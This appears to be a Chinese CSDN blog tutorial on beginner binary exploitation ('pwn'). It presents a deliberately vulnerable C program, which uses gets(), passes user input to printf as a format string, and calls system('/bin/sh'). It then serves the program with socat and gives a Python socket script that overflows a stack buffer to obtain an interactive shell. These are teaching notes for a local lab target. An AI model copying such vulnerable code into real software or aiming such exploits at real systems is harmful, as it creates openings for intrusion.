【pwn入门】使用python打二进制

已于 2023-12-02 22:17:41 修改
阅读量474 收藏 1
点赞数
文章标签: python 服务器 开发语言
于 2023-10-27 22:50:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jeffscott/article/details/134085096
版权

声明

本文是B站你想有多PWN学习的笔记,包含一些视频外的扩展知识。

有问题的源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char sh[]="/bin/sh";
int init_func(){
    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);
    return 0;
}

int func(char *cmd){
    system(cmd);
    return 0;
}

int main(){
    char a[8] = {};
    char b[8] = {};
    puts("input:");
    gets(a);
    printf(a);
    if(b[0]==0x10){
       func(sh);
    }
    return 0;
}

使用以下命令进行编译:

gcc question_1.c -o question_1_plus_x64

程序网络交互初体验

将程序部署成可以远程访问的

socat tcp-l:8877,fork exec:./question_1_plus_x64,reuseaddr

在这里插入图片描述

通过网络访问程序

nc 127.0.0.1 8877

在这里插入图片描述

攻击脚本

import socket
import telnetlib


def pwn():
    # 创建一个TCP socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 连接服务器127.0.0.1的8877
    s.connect(("192.168.44.138", 8877))
    payload = 'A' * 0x8 + '\x10\n'  # 构造payload
    s.sendall(payload.encode(encoding='utf_8', errors='strict'))  # python3这里需要编码
    # 创建一个telnet来产生一个控制服务器的shell
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


if __name__ == "__main__":
    # socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
    pwn()

在这里插入图片描述

Jeff_Scott
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白初学pwn(一)
小明的小书包Ya
09-12 2011
小白初学pwn 安装pwntools pip install pwntools 坑:最好使用Python2版本去运行你的脚本 进入Python交互环境测试一下我们的pwn是否安装好了 ⚡ root@kncc  /work/ctf/pwn-demo  python Python 2.7.15+ (default, Aug 31 2018, 11:56:52) [GCC 8.2.0...
python二进制取反_Python二进制位运算
weixin_39581995的博客
12-05 2457
Python语言能够对整数进行逐位操作,它支持的运算符及含义如下所示:&:按位与|:按位或^:按位异或~:取反<>>:右移对于整型数据,各种位操作是对该数据的补码进行的(正数的补码与原码相同,下面举例皆以正数为例);对于长整型数据,由于其位宽不定,所以进行位运算时,认为其补码的符号位向外无限扩展。下面对各运算符进行举例说明:(1)首先看取反>>> ~1-...
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3077
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
python安装pwn_PWN入门入门——工具安装
weixin_39866874的博客
12-21 1112
安装pwntool:命令行运行:1 pip install pwntools1 python2 importpwn3 pwn.asm("xor eax,eax")出现'1\xc0'说明安装成功在pycharm中运行出错:_curses.error: must call (at least) setupterm() first解决方案:https://stackoverflow.com/quest...
PWN基础工具安装
qq_60737948的博客
10-04 374
工欲善其事必先利其器,pwn基础工具的安装
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1036
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
python实现】 二进制求和
qq_41929011的博客
02-25 1635
给定两个二进制字符串,返回他们的和(用二进制表示)。 输入为非空字符串且只包含数字 1 和 0。 示例 1: 输入: a = “11”, b = “1” 输出: “100” 示例 2: 输入: a = “1010”, b = “1011” 输出: “10101” 思路: 将字符串转换为二进制进行运算。 解答: class Solution: def addBinary(self, a: s...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
warmup pwn入门
02-11
pwn入门
python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 847
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
PWN入门
247533的博客
02-19 637
pwn exp
2018第四届百越杯CTF总结-pwn(附带python调用gdb小技巧)
qq_35661990的博客
12-20 1704
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多说了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 2696
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
python安装pwn_CTF-Pwn-[BJDCTF 2nd] r2t3
weixin_42523792的博客
01-04 185
CTF-Pwn-[BJDCTF 2nd] r2t3博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd] r2t3下载题目的文件R2t3思路使用file命令查看,发现是32位的文件,使用ida...
Pwn环境配置】kali安装python2,python3,pip2,pip3及pwntools
weixin_62621015的博客
04-14 2577
因为最近开始学习pwn,我写的脚本需要再python2环境下运行,而pwn库安装在python3,所以需要在python2下载pwntools,过程中遇到了许多问题,特此记录下来方便后续查看。
Python如何将字符串连接在一起并使用`join()`方法】
最新发布
qq_36253366的博客
07-19 414
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
二进制利用入门Pwn挑战解析
在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的pwn挑战感兴趣的读者准备的。 首先,让我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值